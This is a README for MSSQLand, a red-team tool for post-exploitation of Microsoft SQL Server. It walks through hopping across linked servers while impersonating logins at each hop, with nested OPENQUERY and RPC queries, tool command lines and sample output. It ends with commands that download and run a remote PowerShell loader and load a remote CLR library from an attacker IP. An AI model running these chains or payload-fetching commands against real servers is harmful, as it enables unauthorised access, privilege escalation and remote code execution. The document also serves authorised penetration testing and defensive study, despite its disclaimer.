✈️ MSSQLand

Land gracefully in your target MSSQL DBMS, as if arriving on a business-class flight with a champagne glass in hand. 🥂

MSSQLand is the go-to tool for interacting with Microsoft SQL Server (MSSQL) database management system (DBMS) in your red activities. Designed for constrained environments where operations must be executed directly through your beacon (For Linux-based usage, consider using MSSqlPwner). It allows you to pave your way across multiple linked servers and impersonate anyone (authorised) on the road, popping out of the last hop with any desired action.

📌 Documentation

• For a full list of commands, arguments, and actions, check out COMMANDS.md.
• For an overview of the project structure, refer to STRUCTURE.md.

📖 Example

The tool's output, enriched with timestamps and valuable contextual information, is designed to produce visually appealing and professional results, making it ideal for capturing high-quality screenshots for your reports. All the output tables are Markdown-friendly and can be directly copied and pasted into your notes.

👑 Show Time

You gain access to a database SQL01 mapped to the user dbo. You need to impersonate webapp02 in order to connect to linked database SQL02. In SQL02, you need to impersonate webapp03 in order to go further and so on and so forth. Let's say you’ve landed an agent inside a sqlservr.exe process running under the high-privileged NT AUTHORITY\SYSTEM. Lucky you!

After some reconnaissance, you suspect this is a multi-hop linked server chain. Typing out all those RPC or OPENQUERY calls manually?

This is what it looks like to verify if you are sysadmin in SQL03 when you have to impersonate webapp03 on SQL02 and webapp04 on SQL03:

• OPENQUERY (If sys.servers.is_data_access_enabled):

SELECT * FROM OPENQUERY([SQL02], 'EXECUTE AS LOGIN = ''webapp03''; SELECT * FROM OPENQUERY([SQL03], ''EXECUTE AS LOGIN = ''''webapp04''''; SELECT IS_SRVROLEMEMBER(''''sysadmin''''); REVERT;'') REVERT;')

• RPC Out (If sys.servers.is_rpc_out_enabled):

EXEC ('EXECUTE AS LOGIN = ''webapp03''; EXEC (''EXECUTE AS LOGIN = ''''webapp04''''; SELECT IS_SRVROLEMEMBER(''''sysadmin''''); REVERT;'') AT [SQL03]; REVERT;') AT [SQL02]

No thanks 🚫. Let MSSQLand handle the heavy lifting so you can focus on the big picture. You've already impersonated multiple users on each hop, and now you want to enumerate links on SQL04:

.\MSSQLand.exe /h:localhost:webapp02 /c:token /l:SQL02:webapp03,SQL03:webapp04,SQL04 /a:links

The output is as follows:

[>] Trying to connect with TokenCredentials
[+] Connection opened successfully
|-> Server: localhost,1433
|-> Database: master
|-> Server Version: 15.00.2000
|-> Client Workstation ID: WS-445c74
|-> Client Connection ID: b7c172a7-c349-4268-a466-285d2af89fbb
[i] Logged in on SQL01 as NT AUTHORITY\SYSTEM
|-> Mapped to the user dbo
[i] You can impersonate anyone on SQL01 as a sysadmin
[+] Successfully impersonated user: webapp02
[i] Logged in as webapp02
|-> Mapped to the user dbo
[i] Execution chain: SQL02 -> SQL03 -> SQL04
[i] Logged in on SQL04 as webapps
|-> Mapped to the user guest

[>] Executing action 'Links' against SQL04
|-> Retrieving Linked SQL Servers

| Last Modified        | Link  | Product    | Provider | Data Source | Local Login | Remote Login | RPC Out | OPENQUERY | Collation |
| -------------------- | ----- | ---------- | -------- | ----------- | ----------- | ------------ | ------- | --------- | --------- |
| 7/7/2020 1:02:17 PM  | SQL05 | SQL Server | SQLNCLI  | SQL05       | webapp05    | webapps      | True    | True      | False     |

Now you want to verify who you can impersonate at the end of the chain:

.\MSSQLand.exe /h:localhost:webapp02 /c:token /l:SQL02:webapp03,SQL03:webapp04,SQL04 /a:impersonate

The output shows:

[>] Trying to connect with TokenCredentials
[+] Connection opened successfully
|-> Server: localhost,1433
|-> Database: master
|-> Server Version: 15.00.2000
|-> Client Workstation ID: WS-445c74
|-> Client Connection ID: b7c172a7-c349-4268-a466-285d2af89fbb
[i] Logged in on SQL01 as NT AUTHORITY\SYSTEM
|-> Mapped to the user dbo
[i] You can impersonate anyone as a sysadmin
[+] Successfully impersonated user: webapp02
[i] Server chain: SQL02 -> SQL03 -> SQL04
[i] Logged in as webapps
|-> Mapped to the user guest

[>] Executing action 'Impersonation' against SQL04
|-> Starting impersonation check for all logins
|-> Checking impersonation permissions individually

| Logins      | Impersonation |
| ----------- | ------------- |
| sa          | No            |
| MarieJo     | Yes           |
| Imane       | Yes           |
| John        | No            |

Great! Now you can directly reach out to your loader with:

.\MSSQLand.exe /h:localhost:webapp02 /c:token /l:SQL02:webapp03,SQL03:webapp04,SQL04:MarieJo /a:pwshdl "172.16.118.218/d/g/hollow.ps1"

Or even use Common Language Runtime (CLR) to load remotely a library with:

/a:clr \"http://172.16.118.218/d/SqlLibrary.dll\"

🫂 Contributing

Contributions to MSSQLand are welcome and appreciated! Whether it's fixing bugs, adding new features, improving the documentation, or sharing feedback, your effort is valued and makes a difference. Open-source thrives on collaboration and recognition. Contributions, large or small, help improve the tool and its community. Your time and effort are truly valued.

Here, no one will be erased from Git history. No fear to have here—no one will copy-paste your code without adhering to the collaborative ethos of open-source.

Please see the CONTRIBUTING.md for detailed guidelines on how to get started.

🥚 Origin

MSSQLand was initially inspired by SQLRecon, which provided a solid foundation for MS SQL post-exploitation and reconnaissance. However, during my contributions to SQLRecon — particularly in addressing chained linked server traversal and enhancing user impersonation — I encountered significant roadblocks in how contributions were handled. My pull request, which introduced major improvements in impersonation, chaining, and context management, was ultimately not merged but copy pasted.

Rather than let this work go to waste, I decided to develop MSSQLand, an OOP-driven, modular, and community-friendly alternative. Unlike SQLRecon, which required deep refactoring to make simple modifications, MSSQLand was built with developers in mind. The tool is built with extensibility in mind, allowing integration of new features while maintaining clarity and simplicity. It aims to provide a structured, customizable, and operator-friendly experience for engagements requiring MS SQL exploitation.

While I appreciate the inspiration SQLRecon provided, MSSQLand is designed to be open to contributions, transparent in development, and aligned with the collaborative spirit of open-source software.

⚠️ Disclaimer

This tool is designed for educational purposes only and is intended to assist security professionals in understanding and testing the security of SQL Server environments in authorized engagements. It is specifically crafted to be used in controlled environments, such as:

• Penetration testing labs (e.g., HackTheBox, OffSec exam scenarios).
• Personal lab setups designed for ethical hacking and security research.

Legal Notice

Any unauthorized use of this tool in real-world environments or against systems without explicit permission from the system owner is strictly prohibited and may violate legal and ethical standards. The creators and contributors of this tool are not responsible for any misuse or damage caused.

Use responsibly and ethically. Always respect the law and obtain proper authorization.